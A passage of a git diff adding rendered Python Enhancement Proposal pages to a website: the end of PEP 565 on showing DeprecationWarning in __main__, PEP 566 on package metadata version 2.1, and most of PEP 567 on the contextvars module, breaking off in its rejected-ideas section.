This change will mean that code entered at the interactive prompt and code in +single file scripts will revert to reporting these warnings by default, while +they will continue to be silenced by default for packaged code distributed as +part of an importable module.

+

The PEP also proposes a number of small adjustments to the reference +interpreter and standard library documentation to help make the warnings +subsystem more approachable for new Python developers.

+

As part of the documentation updates, it will be made clearer that the +unittest test runner displays all warnings by default when executing +test cases, and that other test runners are advised to follow that example.

+
+
+

Specification

+
+

New default warnings filter entry

+

The current set of default warnings filters consists of:

+
ignore::DeprecationWarning
+ignore::PendingDeprecationWarning
+ignore::ImportWarning
+ignore::BytesWarning
+ignore::ResourceWarning
+
+
+

The default unittest test runner then uses warnings.catch_warnings() and warnings.simplefilter('default') to override the default filters while running test cases.

+

The change proposed in this PEP is to update the default warning filter list +to be:

+
default::DeprecationWarning:__main__
+ignore::DeprecationWarning
+ignore::PendingDeprecationWarning
+ignore::ImportWarning
+ignore::BytesWarning
+ignore::ResourceWarning
+
+
+

This means that in cases where the nominal location of the warning (as +determined by the stacklevel parameter to warnings.warn) is in the +__main__ module, the first occurrence of each DeprecationWarning will once +again be reported.

+

This change will lead to DeprecationWarning being displayed by default for:

+
    +
  • code executed directly at the interactive prompt
  • +
  • code executed directly as part of a single-file script
  • +
+

While continuing to be hidden by default for:

+
    +
  • code imported from another module in a zipapp archive’s __main__.py +file
  • +
  • code imported from another module in an executable package’s __main__ +submodule
  • +
  • code imported from an executable script wrapper generated at installation time +based on a console_scripts or gui_scripts entry point definition
  • +
+

This means that tool developers that create an installable or executable +artifact (such as a zipapp archive) for distribution to their users +shouldn’t see any change from the status quo, while users of more ad hoc +personal or locally distributed scripts are likely to start seeing relevant +deprecation warnings again (as they did in Python 2.6 and earlier).

+
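
A small sketch of the effect (hypothetical script.py):

+
# script.py
+import warnings
+warnings.warn("this API is going away", DeprecationWarning)
+
+# $ python3.7 script.py           -> warning attributed to __main__: shown
+# $ python3.7 -c "import script"  -> warning attributed to 'script': hidden
+
+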
+
+

Additional use case for FutureWarning

+

The standard library documentation will be updated to explicitly recommend the +use of FutureWarning (rather than DeprecationWarning) for backwards +compatibility warnings that are intended to be seen by users of an +application. (This will be in addition to the existing use of FutureWarning +to warn about constructs that will remain valid code in the future, +but will have different semantics).

+

This will give the following three distinct categories of backwards +compatibility warning, with three different intended audiences:

+
    +
  • PendingDeprecationWarning: hidden by default for all code. +The intended audience is Python developers that take an active interest in +ensuring the future compatibility of their software (e.g. professional +Python application developers with specific support obligations).
  • +
  • DeprecationWarning: reported by default for code that runs directly in +the __main__ module (as such code is considered relatively unlikely to +have a dedicated test suite), but hidden by default for code in other modules. +The intended audience is Python developers that are at risk of upgrades to +their dependencies (including upgrades to Python itself) breaking their +software (e.g. developers using Python to script environments where someone +else is in control of the timing of dependency upgrades).
  • +
  • FutureWarning: reported by default for all code. +The intended audience is users of applications written in Python, rather than +other Python developers (e.g. warning about use of a deprecated setting in a +configuration file format).
  • +
+

For library and framework authors that want to ensure their API compatibility +warnings are more reliably seen by their users, the recommendation is to use a +custom warning class that derives from DeprecationWarning in Python 3.7+, +and from FutureWarning in earlier versions.

+
+ + +
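
A minimal sketch of that recommendation (hypothetical library code):

+
import sys
+import warnings
+
+_base = DeprecationWarning if sys.version_info >= (3, 7) else FutureWarning
+
+class MyLibDeprecationWarning(_base):
+    """Compatibility warning intended to be seen by users of mylib."""
+
+def old_api():
+    warnings.warn("old_api() is deprecated; use new_api()",
+                  MyLibDeprecationWarning, stacklevel=2)
+
+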
+

Other documentation updates

+

The current reference documentation for the warnings system is relatively short on specific examples of possible settings for the -W command line option or the PYTHONWARNINGS environment variable that achieve particular end results.

+

The following improvements are proposed as part of the implementation of this +PEP:

+
    +
  • Explicitly list the following entries under the description of the +PYTHONWARNINGS environment variable:
    PYTHONWARNINGS=error # Convert to exceptions
    +PYTHONWARNINGS=always # Warn every time
    +PYTHONWARNINGS=default # Warn once per call location
    +PYTHONWARNINGS=module # Warn once per calling module
    +PYTHONWARNINGS=once # Warn once per Python process
    +PYTHONWARNINGS=ignore # Never warn
    +
    +
    +
  • +
  • Explicitly list the corresponding short options +(-We, -Wa, -Wd, -Wm, -Wo, -Wi) for each of the +warning actions listed under the -W command line switch documentation
  • +
  • Explicitly list the default filter set in the warnings module +documentation, using the action::category and action::category:module +notation
  • +
  • Explicitly list the following snippet in the warnings.simplefilter +documentation as a recommended approach to turning off all warnings by +default in a Python application while still allowing them to be turned +back on via PYTHONWARNINGS or the -W command line switch:
    if not sys.warnoptions:
    +    warnings.simplefilter("ignore")
    +
    +
    +
  • +
+

None of these are new (they already work in all still supported Python +versions), but they’re not especially obvious given the current structure +of the related documentation.

+
+
+
+

Reference Implementation

+

A reference implementation is available in the PR [4] linked from the +related tracker issue for this PEP [5].

+

As a side-effect of implementing this PEP, the internal warnings filter list +will start allowing the use of plain strings as part of filter definitions (in +addition to the existing use of compiled regular expressions). When present, +the plain strings will be compared for exact matches only. This approach allows +the new default filter to be added during interpreter startup without requiring +early access to the re module.

+
+
+

Motivation

+

As discussed in [1] and mentioned in [2], Python 2.7 and Python 3.2 changed +the default handling of DeprecationWarning such that:

+
    +
  • the warning was hidden by default during normal code execution
  • +
  • the unittest test runner was updated to re-enable it when running tests
  • +
+

The intent was to avoid cases of tooling output like the following:

+
$ devtool mycode/
+/usr/lib/python3.6/site-packages/devtool/cli.py:1: DeprecationWarning: 'async' and 'await' will become reserved keywords in Python 3.7
+  async = True
+... actual tool output ...
+
+
+

Even when devtool is a tool specifically for Python programmers, this is not +a particularly useful warning, as it will be shown on every invocation, even +though the main helpful step an end user can take is to report a bug to the +developers of devtool.

+

The warning is even less helpful for general purpose developer tools that are used across more languages than just Python, and almost entirely unhelpful for applications that simply happen to be written in Python, and aren’t necessarily intended for a developer audience at all.

+

However, this change proved to have unintended consequences for the following +audiences:

+
    +
  • anyone using a test runner other than the default one built into unittest +(the request for third party test runners to change their default warnings +filters was never made explicitly, so many of them still rely on the +interpreter defaults that are designed to suit deployed applications)
  • +
  • anyone using the default unittest test runner to test their Python code +in a subprocess (since even unittest only adjusts the warnings settings +in the current process)
  • +
  • anyone writing Python code at the interactive prompt or as part of a directly +executed script that didn’t have a Python level test suite at all
  • +
+

In these cases, DeprecationWarning ended up becoming almost entirely equivalent to PendingDeprecationWarning: it was simply never seen at all.

+
+
+

Limitations on PEP Scope

+

This PEP exists specifically to explain both the proposed addition to the +default warnings filter for 3.7, and to more clearly articulate the rationale +for the original change to the handling of DeprecationWarning back in Python 2.7 +and 3.2.

+

This PEP does not solve all known problems with the current approach to handling +deprecation warnings. Most notably:

+
    +
  • The default unittest test runner does not currently report deprecation +warnings emitted at module import time, as the warnings filter override is only +put in place during test execution, not during test discovery and loading.
  • +
  • The default unittest test runner does not currently report deprecation +warnings in subprocesses, as the warnings filter override is applied directly +to the loaded warnings module, not to the PYTHONWARNINGS environment +variable.
  • +
  • The standard library doesn’t provide a straightforward way to opt-in to seeing +all warnings emitted by a particular dependency prior to upgrading it +(the third-party warn module [3] does provide this, but enabling it +involves monkeypatching the standard library’s warnings module).
  • +
  • When software has been factored out into support modules, but those modules +have little or no automated test coverage, re-enabling deprecation warnings +by default in __main__ isn’t likely to help find API compatibility +problems. Near term, the best currently available answer is to run affected +applications with PYTHONWARNINGS=default::DeprecationWarning or +python -W default::DeprecationWarning and pay attention to their +stderr output. Longer term, this is really a question for researchers +working on static analysis of Python code: how to reliably find usage of +deprecated APIs, and how to infer that an API or parameter is deprecated +based on warnings.warn calls, without actually running either the code +providing the API or the code accessing it.
  • +
+

While these are real problems with the status quo, they’re excluded from +consideration in this PEP because they’re going to require more complex +solutions than a single additional entry in the default warnings filter, +and resolving them may not require going through the PEP process at all.

+

For anyone interested in pursuing them further, the first two would be +unittest module enhancement requests, the third would be a warnings +module enhancement request, while the last would only require a PEP if +inferring API deprecations from their contents was deemed to be an intractable +code analysis problem, and an explicit function and parameter marker syntax in +annotations was proposed instead.

+

The CPython reference implementation will also include the following related +changes in 3.7:

+ +

Independently of the proposed changes to the default filters in this PEP, +issue 32229 [7] is a proposal to add a warnings.hide_warnings API to +make it simpler for application developers to hide warnings during normal +operation, while easily making them visible when testing.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0565.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0566/index.html new file mode 100644 index 00000000000..4cee8e0d9aa --- /dev/null +++ b/pep-0566/index.html @@ -0,0 +1,310 @@ PEP 566 – Metadata for Python Software Packages 2.1 | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 566 – Metadata for Python Software Packages 2.1

+
+
Author:
+
Dustin Ingram <di at python.org>
+
BDFL-Delegate:
+
Daniel Holth
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
01-Dec-2017
+
Python-Version:
+
3.x
+
Post-History:
+

+
Replaces:
+
345
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP describes the changes between versions 1.2 and 2.1 of the core +metadata specification for Python packages. Version 1.2 is specified in +PEP 345.

+

It also changes the canonical source for field specifications to the Core +Metadata Specification reference document, which specifies the field names +along with their semantics and usage.

+
+
+

Fields

+

The canonical source for the names and semantics of each of the supported +metadata fields is the Core Metadata Specification document.

+

Fields marked with “(Multiple use)” may be specified multiple times in a single +PKG-INFO file. Other fields may only occur once in a PKG-INFO file. Fields +marked with “(optional)” are not required to appear in a valid PKG-INFO file; +all other fields must be present.

+
+

New in Version 2.1

+
+

Description-Content-Type (optional)

+

A string stating the markup syntax (if any) used in the distribution’s +description, so that tools can intelligently render the description.

+

Historically, tools like PyPI assume that a package’s description is formatted +in reStructuredText (reST), and +fall back on plain text if the description is not valid reST.

+

The introduction of this field allows PyPI to support additional types of +markup syntax, and not need to make this assumption.

+
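For illustration, a project whose description is written in GitHub-flavored Markdown might declare a header like the following (the exact value shown is just an example of the type/subtype-plus-parameters form this field takes):

+
Description-Content-Type: text/markdown; charset=UTF-8; variant=GFM
+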

The full specification for this field is defined in the Core Metadata +Specification.

+
+
+

Provides-Extra (optional, multiple use)

+

A string containing the name of an optional feature. Must be a valid Python +identifier. May be used to make a dependency conditional on whether the +optional feature has been requested.

+

The introduction of this field allows package installation tools (such as +pip) to determine which extras are provided by a given package, and package +publication tools (such as twine) to check for issues with environment +markers which use extras.

+
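For example, a package offering an optional "pdf" feature might declare (an illustrative PKG-INFO fragment):

+
Provides-Extra: pdf
+Requires-Dist: reportlab; extra == 'pdf'
+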

The full specification for this field is defined in the Core Metadata +Specification.

+
+
+
+

Changed in Version 2.1

+
+

Name

+

The specification for the format of this field is now identical to the +distribution name specification defined in PEP 508.

+
+
+

Description

+

In addition to the Description header field, the distribution’s +description may instead be provided in the message body (i.e., after a +completely blank line following the headers, with no indentation or other +special formatting necessary).

+
+
+
+
+

Version Specifiers

+

Version numbering requirements and the semantics for specifying comparisons +between versions are defined in PEP 440. Direct references as defined in +PEP 440 are also permitted as an alternative to version specifiers.

+

Following PEP 508, version specifiers no longer need to be surrounded by +parentheses in the fields Requires-Dist, Provides-Dist, Obsoletes-Dist or +Requires-External, so e.g. requests >= 2.8.1 is now a valid value. +The recommended format is without parentheses, but tools parsing metadata should +also be able to handle version specifiers in parentheses. Further, public index +servers MAY prohibit strict version matching clauses or direct references in +these fields.

+

Usage of version specifiers is otherwise unchanged from PEP 345.

+
+
+

Environment markers

+

An environment marker is a marker that can be added at the end of a +field after a semi-colon (“;”), to add a condition about the execution +environment.

+
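For example, the following illustrative field makes a dependency apply only on Windows:

+
Requires-Dist: pywin32 >= 1.0; sys_platform == 'win32'
+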

The environment marker format used to declare such a condition is defined in +the environment markers section of PEP 508.

+

Usage of environment markers is otherwise unchanged from PEP 345.

+
+
+

JSON-compatible Metadata

+

It may be necessary to store metadata in a data structure which does not +allow for multiple repeated keys, such as JSON.

+

The canonical method to transform metadata fields into such a data structure is +as follows:

+
    +
  1. The original key-value format should be read with +email.parser.HeaderParser;
  2. +
  3. All transformed keys should be reduced to lower case. Hyphens should be +replaced with underscores, but otherwise should retain all other characters;
  4. +
  5. The transformed value for any field marked with “(Multiple use)” should be a +single list containing all the original values for the given key;
  6. +
  7. The Keywords field should be converted to a list by splitting the +original value on commas;
  8. +
  9. The message body, if present, should be set to the value of the +description key.
  10. +
  11. The result should be stored as a string-keyed dictionary.
  12. +
+
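A minimal sketch of that transformation (the helper name and the MULTIPLE_USE subset below are illustrative, not part of the specification):

+
import email.parser
+
+# Illustrative subset; a real tool would list every multiple-use field.
+MULTIPLE_USE = {"Classifier", "Provides-Extra", "Requires-Dist",
+                "Project-URL"}
+
+def to_json_compatible(pkg_info_text):
+    # Step 1: read the original key-value format with HeaderParser.
+    msg = email.parser.HeaderParser().parsestr(pkg_info_text)
+    result = {}
+    for key in frozenset(msg.keys()):
+        # Step 2: lower-case keys and replace hyphens with underscores.
+        name = key.lower().replace("-", "_")
+        if key in MULTIPLE_USE:
+            result[name] = msg.get_all(key)  # step 3: keep all values
+        else:
+            result[name] = msg[key]
+    # Step 4: split Keywords on commas.
+    if "keywords" in result:
+        result["keywords"] = result["keywords"].split(",")
+    # Step 5: the message body, if present, becomes the description.
+    if msg.get_payload():
+        result["description"] = msg.get_payload()
+    return result
+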
+
+

Summary of Differences From PEP 345

+
    +
  • Metadata-Version is now 2.1.
  • +
  • Fields are now specified via the Core Metadata Specification.
  • +
  • Added two new fields: Description-Content-Type and Provides-Extra.
  • +
  • Acceptable values for the Name field are now specified as per PEP 508.
  • +
  • Added canonical method of transformation into JSON-compatible data structure.
  • +
+
+
+

References

+

This document specifies version 2.1 of the metadata format. +Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345. +Version 2.0, while not formally accepted, was specified in PEP 426.

+
+ +
+

Acknowledgements

+

Thanks to Alyssa Coghlan and Thomas Kluyver for contributing to this PEP.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0566.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0567/index.html new file mode 100644 index 00000000000..1f9b4ecf67e --- /dev/null +++ b/pep-0567/index.html @@ -0,0 +1,1004 @@ PEP 567 – Context Variables | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 567 – Context Variables

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2017
+
Python-Version:
+
3.7
+
Post-History:
+
12-Dec-2017, 28-Dec-2017, 16-Jan-2018
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a new contextvars module and a set of new +CPython C APIs to support context variables. This concept is +similar to thread-local storage (TLS), but, unlike TLS, it also allows +correctly keeping track of values per asynchronous task, e.g. +asyncio.Task.

+

This proposal is a simplified version of PEP 550. The key +difference is that this PEP is concerned only with solving the case +for asynchronous tasks, not for generators. There are no proposed +modifications to any built-in types or to the interpreter.

+

This proposal is not strictly related to Python context managers, although +it does provide a mechanism that context managers can use to store their +state.

+
+
+

API Design and Implementation Revisions

+

In Python 3.7.1 the signatures of all context variables +C APIs were changed to use PyObject * pointers instead +of PyContext *, PyContextVar *, and PyContextToken *, +e.g.:

+
// in 3.7.0:
+PyContext *PyContext_New(void);
+
+// in 3.7.1+:
+PyObject *PyContext_New(void);
+
+
+

See [6] for more details. The C API section of this PEP was +updated to reflect the change.

+
+
+

Rationale

+

Thread-local variables are insufficient for asynchronous tasks that +execute concurrently in the same OS thread. Any context manager that +saves and restores a context value using threading.local() will +have its context values bleed to other code unexpectedly when used +in async/await code.

+

A few examples where having a working context local storage for +asynchronous code is desirable:

+
    +
  • Context managers like decimal contexts and numpy.errstate.
  • +
  • Request-related data, such as security tokens and request +data in web applications, language context for gettext, etc.
  • +
  • Profiling, tracing, and logging in large code bases.
  • +
+
+
+

Introduction

+

The PEP proposes a new mechanism for managing context variables. +The key classes involved in this mechanism are contextvars.Context +and contextvars.ContextVar. The PEP also proposes some policies +for using the mechanism around asynchronous tasks.

+

The proposed mechanism for accessing context variables uses the +ContextVar class. A module (such as decimal) that wishes to +use the new mechanism should:

+
    +
  • declare a module-global variable holding a ContextVar to +serve as a key;
  • +
  • access the current value via the get() method on the +key variable;
  • +
  • modify the current value via the set() method on the +key variable.
  • +
+

The notion of “current value” deserves special consideration: +different asynchronous tasks that exist and execute concurrently +may have different values for the same key. This idea is well known +from thread-local storage but in this case the locality of the value is +not necessarily bound to a thread. Instead, there is the notion of the +“current Context” which is stored in thread-local storage. +Manipulation of the current context is the responsibility of the +task framework, e.g. asyncio.

+

A Context is a mapping of ContextVar objects to their values. +The Context itself exposes the abc.Mapping interface +(not abc.MutableMapping!), so it cannot be modified directly. +To set a new value for a context variable in a Context object, +the user needs to:

+
    +
  • make the Context object “current” using the Context.run() +method;
  • +
  • use ContextVar.set() to set a new value for the context +variable.
  • +
+

The ContextVar.get() method looks for the variable in the current +Context object using self as a key.

+

It is not possible to get a direct reference to the current Context +object, but it is possible to obtain a shallow copy of it using the +contextvars.copy_context() function. This ensures that the +caller of Context.run() is the sole owner of its Context +object.

+
+
+

Specification

+

A new standard library module contextvars is added with the +following APIs:

+
    +
  1. The copy_context() -> Context function is used to get a copy of +the current Context object for the current OS thread.
  2. +
  3. The ContextVar class to declare and access context variables.
  4. +
  5. The Context class encapsulates context state. Every OS thread +stores a reference to its current Context instance. +It is not possible to control that reference directly. +Instead, the Context.run(callable, *args, **kwargs) method is +used to run Python code in another context.
  6. +
+
+

contextvars.ContextVar

+

The ContextVar class has the following constructor signature: +ContextVar(name, *, default=_NO_DEFAULT). The name parameter +is used for introspection and debug purposes, and is exposed +as a read-only ContextVar.name attribute. The default +parameter is optional. Example:

+
# Declare a context variable 'var' with the default value 42.
+var = ContextVar('var', default=42)
+
+
+

(The _NO_DEFAULT is an internal sentinel object used to +detect if the default value was provided.)

+

ContextVar.get(default=_NO_DEFAULT) returns a value for +the context variable for the current Context:

+
# Get the value of `var`.
+var.get()
+
+
+

If there is no value for the variable in the current context, +ContextVar.get() will:

+
    +
  • return the value of the default argument of the get() method, +if provided; or
  • +
  • return the default value for the context variable, if provided; or
  • +
  • raise a LookupError.
  • +
+

ContextVar.set(value) -> Token is used to set a new value for +the context variable in the current Context:

+
# Set the variable 'var' to 1 in the current context.
+var.set(1)
+
+
+

ContextVar.reset(token) is used to reset the variable in the +current context to the value it had before the set() operation +that created the token (or to remove the variable if it was +not set):

+
# Assume: var.get(None) is None
+
+# Set 'var' to 1:
+token = var.set(1)
+try:
+    # var.get() == 1
+finally:
+    var.reset(token)
+
+# After reset: var.get(None) is None,
+# i.e. 'var' was removed from the current context.
+
+
+

The ContextVar.reset() method raises:

+
    +
  • a ValueError if it is called with a token object created +by another variable;
  • +
  • a ValueError if the current Context object does not match +the one where the token object was created;
  • +
  • a RuntimeError if the token object has already been used once +to reset the variable.
  • +
+
+
+

contextvars.Token

+

contextvars.Token is an opaque object that should be used to +restore the ContextVar to its previous value, or to remove it from +the context if the variable was not set before. It can be created +only by calling ContextVar.set().

+

For debug and introspection purposes it has:

+
    +
  • a read-only attribute Token.var pointing to the variable +that created the token;
  • +
  • a read-only attribute Token.old_value set to the value the +variable had before the set() call, or to Token.MISSING +if the variable wasn’t set before.
  • +
+
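For instance (an illustrative snippet, assuming a variable that has not been set in the current context):

+
from contextvars import ContextVar, Token
+
+var = ContextVar('var')    # no default, never set so far
+token = var.set(10)
+
+assert token.var is var
+assert token.old_value is Token.MISSING  # 'var' had no prior value
+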
+
+

contextvars.Context

+

Context object is a mapping of context variables to values.

+

Context() creates an empty context. To get a copy of the current +Context for the current OS thread, use the +contextvars.copy_context() function:

+
ctx = contextvars.copy_context()
+
+
+

To run Python code in some Context, use the Context.run() +method:

+
ctx.run(function)
+
+
+

Any changes to any context variables that function causes will +be contained in the ctx context:

+
var = ContextVar('var')
+var.set('spam')
+
+def main():
+    # 'var' was set to 'spam' before
+    # calling 'copy_context()' and 'ctx.run(main)', so:
+    # var.get() == ctx[var] == 'spam'
+
+    var.set('ham')
+
+    # Now, after setting 'var' to 'ham':
+    # var.get() == ctx[var] == 'ham'
+
+ctx = copy_context()
+
+# Any changes that the 'main' function makes to 'var'
+# will be contained in 'ctx'.
+ctx.run(main)
+
+# The 'main()' function was run in the 'ctx' context,
+# so changes to 'var' are contained in it:
+# ctx[var] == 'ham'
+
+# However, outside of 'ctx', 'var' is still set to 'spam':
+# var.get() == 'spam'
+
+
+

Context.run() raises a RuntimeError when called on the same +context object from more than one OS thread, or when called +recursively.

+

Context.copy() returns a shallow copy of the context object.

+

Context objects implement the collections.abc.Mapping ABC. +This can be used to introspect contexts:

+
ctx = contextvars.copy_context()
+
+# Print all context variables and their values in 'ctx':
+print(ctx.items())
+
+# Print the value of 'some_variable' in context 'ctx':
+print(ctx[some_variable])
+
+
+

Note that all Mapping methods, including Context.__getitem__ and +Context.get, ignore default values for context variables +(i.e. ContextVar.default). This means that for a variable var +that was created with a default value and was not set in the +context:

+
    +
  • context[var] raises a KeyError,
  • +
  • var in context returns False,
  • +
  • the variable isn’t included in context.items(), etc.
  • +
+
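For instance (an illustrative, runnable snippet):

+
from contextvars import ContextVar, copy_context
+
+var = ContextVar('var', default=42)
+ctx = copy_context()
+
+assert var.get() == 42     # found via the variable's default
+assert var not in ctx      # the Mapping API ignores defaults
+# ctx[var] would raise a KeyError for the same reason.
+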
+
+

asyncio

+

asyncio uses Loop.call_soon(), Loop.call_later(), +and Loop.call_at() to schedule the asynchronous execution of a +function. asyncio.Task uses call_soon() to run the +wrapped coroutine.

+

We modify Loop.call_{at,later,soon} and +Future.add_done_callback() to accept the new optional context +keyword-only argument, which defaults to the current context:

+
def call_soon(self, callback, *args, context=None):
+    if context is None:
+        context = contextvars.copy_context()
+
+    # ... some time later
+    context.run(callback, *args)
+
+
+

Tasks in asyncio need to maintain their own context that they inherit +from the point they were created at. asyncio.Task is modified +as follows:

+
class Task:
+    def __init__(self, coro):
+        ...
+        # Get the current context snapshot.
+        self._context = contextvars.copy_context()
+        self._loop.call_soon(self._step, context=self._context)
+
+    def _step(self, exc=None):
+        ...
+        # Every advance of the wrapped coroutine is done in
+        # the task's context.
+        self._loop.call_soon(self._step, context=self._context)
+        ...
+
+
+
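The following minimal, runnable sketch (not from the PEP text) illustrates the effect of this design: each task runs in its own copy of the context it was created in, so concurrent set() calls do not interfere:

+
import asyncio
+import contextvars
+
+request_id = contextvars.ContextVar('request_id', default='-')
+
+async def handler(rid):
+    request_id.set(rid)        # visible only in this task's context
+    await asyncio.sleep(0.01)  # let the other task run in between
+    assert request_id.get() == rid
+
+async def main():
+    await asyncio.gather(handler('A'), handler('B'))
+    # main() never set the variable in its own context:
+    assert request_id.get() == '-'
+
+asyncio.run(main())
+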
+
+
+

Implementation

+

This section explains high-level implementation details in +pseudo-code. Some optimizations are omitted to keep this section +short and clear.

+

The Context mapping is implemented using an immutable dictionary. +This allows for an O(1) implementation of the copy_context() +function. The reference implementation implements the immutable +dictionary using Hash Array Mapped Tries (HAMT); see PEP 550 +for analysis of HAMT performance [1].

+

For the purposes of this section, we implement an immutable dictionary +using a copy-on-write approach and the built-in dict type:

+
class _ContextData:
+
+    def __init__(self):
+        self._mapping = dict()
+
+    def __getitem__(self, key):
+        return self._mapping[key]
+
+    def __contains__(self, key):
+        return key in self._mapping
+
+    def __len__(self):
+        return len(self._mapping)
+
+    def __iter__(self):
+        return iter(self._mapping)
+
+    def set(self, key, value):
+        copy = _ContextData()
+        copy._mapping = self._mapping.copy()
+        copy._mapping[key] = value
+        return copy
+
+    def delete(self, key):
+        copy = _ContextData()
+        copy._mapping = self._mapping.copy()
+        del copy._mapping[key]
+        return copy
+
+
+

Every OS thread has a reference to the current Context object:

+
class PyThreadState:
+    context: Context
+
+
+

contextvars.Context is a wrapper around _ContextData:

+
class Context(collections.abc.Mapping):
+
+    _data: _ContextData
+    _prev_context: Optional[Context]
+
+    def __init__(self):
+        self._data = _ContextData()
+        self._prev_context = None
+
+    def run(self, callable, *args, **kwargs):
+        if self._prev_context is not None:
+            raise RuntimeError(
+                f'cannot enter context: {self} is already entered')
+
+        ts: PyThreadState = PyThreadState_Get()
+        self._prev_context = ts.context
+        try:
+            ts.context = self
+            return callable(*args, **kwargs)
+        finally:
+            ts.context = self._prev_context
+            self._prev_context = None
+
+    def copy(self):
+        new = Context()
+        new._data = self._data
+        return new
+
+    # Implement abstract Mapping.__getitem__
+    def __getitem__(self, var):
+        return self._data[var]
+
+    # Implement abstract Mapping.__contains__
+    def __contains__(self, var):
+        return var in self._data
+
+    # Implement abstract Mapping.__len__
+    def __len__(self):
+        return len(self._data)
+
+    # Implement abstract Mapping.__iter__
+    def __iter__(self):
+        return iter(self._data)
+
+    # The rest of the Mapping methods are implemented
+    # by collections.abc.Mapping.
+
+
+

contextvars.copy_context() is implemented as follows:

+
def copy_context():
+    ts: PyThreadState = PyThreadState_Get()
+    return ts.context.copy()
+
+
+

contextvars.ContextVar interacts with PyThreadState.context +directly:

+
class ContextVar:
+
+    def __init__(self, name, *, default=_NO_DEFAULT):
+        self._name = name
+        self._default = default
+
+    @property
+    def name(self):
+        return self._name
+
+    def get(self, default=_NO_DEFAULT):
+        ts: PyThreadState = PyThreadState_Get()
+        try:
+            return ts.context[self]
+        except KeyError:
+            pass
+
+        if default is not _NO_DEFAULT:
+            return default
+
+        if self._default is not _NO_DEFAULT:
+            return self._default
+
+        raise LookupError
+
+    def set(self, value):
+        ts: PyThreadState = PyThreadState_Get()
+
+        data: _ContextData = ts.context._data
+        try:
+            old_value = data[self]
+        except KeyError:
+            old_value = Token.MISSING
+
+        updated_data = data.set(self, value)
+        ts.context._data = updated_data
+        return Token(ts.context, self, old_value)
+
+    def reset(self, token):
+        if token._used:
+            raise RuntimeError("Token has already been used once")
+
+        if token._var is not self:
+            raise ValueError(
+                "Token was created by a different ContextVar")
+
+        ts: PyThreadState = PyThreadState_Get()
+        if token._context is not ts.context:
+            raise ValueError(
+                "Token was created in a different Context")
+
+        if token._old_value is Token.MISSING:
+            ts.context._data = ts.context._data.delete(token._var)
+        else:
+            ts.context._data = ts.context._data.set(token._var,
+                                                    token._old_value)
+
+        token._used = True
+
+
+

Note that in the reference implementation, ContextVar.get() +has an internal cache for the most recent value, which allows it to +bypass a hash lookup. This is similar to the optimization the +decimal module implements to retrieve its context from +PyThreadState_GetDict(). See PEP 550, which explains the +implementation of the cache in great detail.

+

The Token class is implemented as follows:

+
class Token:
+
+    MISSING = object()
+
+    def __init__(self, context, var, old_value):
+        self._context = context
+        self._var = var
+        self._old_value = old_value
+        self._used = False
+
+    @property
+    def var(self):
+        return self._var
+
+    @property
+    def old_value(self):
+        return self._old_value
+
+
+
+
+

Summary of the New APIs

+
+

Python API

+
    +
  1. A new contextvars module with ContextVar, Context, +and Token classes, and a copy_context() function.
  2. +
  3. asyncio.Loop.call_at(), asyncio.Loop.call_later(), +asyncio.Loop.call_soon(), and +asyncio.Future.add_done_callback() run callback functions in +the context they were called in. A new context keyword-only +parameter can be used to specify a custom context.
  4. +
  5. asyncio.Task is modified internally to maintain its own +context.
  6. +
+
+
+

C API

+
    +
  1. PyObject * PyContextVar_New(char *name, PyObject *default): +create a ContextVar object. The default argument can be +NULL, which means that the variable has no default value.
  2. +
  3. int PyContextVar_Get(PyObject *, PyObject *default_value, PyObject **value): +return -1 if an error occurs during the lookup, 0 otherwise. +If a value for the context variable is found, it will be set to the +value pointer. Otherwise, value will be set to +default_value when it is not NULL. If default_value is +NULL, value will be set to the default value of the +variable, which can be NULL too. value is always a new +reference. (A usage sketch follows this list.)
  4. +
  5. PyObject * PyContextVar_Set(PyObject *, PyObject *): +set the value of the variable in the current context.
  6. +
  7. PyContextVar_Reset(PyObject *, PyObject *): +reset the value of the context variable.
  8. +
  9. PyObject * PyContext_New(): create a new empty context.
  10. +
  11. PyObject * PyContext_Copy(PyObject *): return a shallow +copy of the passed context object.
  12. +
  13. PyObject * PyContext_CopyCurrent(): get a copy of the current +context.
  14. +
  15. int PyContext_Enter(PyObject *) and +int PyContext_Exit(PyObject *) allow to set and restore +the context for the current OS thread. It is required to always +restore the previous context:
    PyObject *old_ctx = PyContext_Copy();
    +if (old_ctx == NULL) goto error;
    +
    +if (PyContext_Enter(new_ctx)) goto error;
    +
    +// run some code
    +
    +if (PyContext_Exit(old_ctx)) goto error;
    +
    +
    +
  16. +
+
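As a hedged illustration of how the PyContextVar_New() and PyContextVar_Get() calls above might be used from an extension module (3.7.1+ signatures; error handling abbreviated):

+
PyObject *var = PyContextVar_New("myvar", NULL);  /* no default value */
+if (var == NULL) { /* handle error */ }
+
+PyObject *value;
+if (PyContextVar_Get(var, Py_None, &value) < 0) {
+    /* an exception was set during the lookup */
+}
+/* 'value' is a new reference; Py_None here, since the variable
+   was never set and has no default */
+Py_XDECREF(value);
+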
+
+
+

Rejected Ideas

+
+

Replicating threading.local() interface

+

Please refer to PEP 550 where this topic is covered in detail: [2].

+
+
+

Replacing Token with ContextVar.unset()

+

The Token API avoids the need for a ContextVar.unset() +method, which would be incompatible with the chained contexts design of +PEP 550. Future compatibility with PEP 550 is desired +in case there is demand to support context variables in generators +and asynchronous generators.

+

The Token API also offers better usability: the user does not have +to special-case absence of a value. Compare:

+
token = cv.set(new_value)
+try:
+    # cv.get() is new_value
+finally:
+    cv.reset(token)
+
+
+

with:

+
_deleted = object()
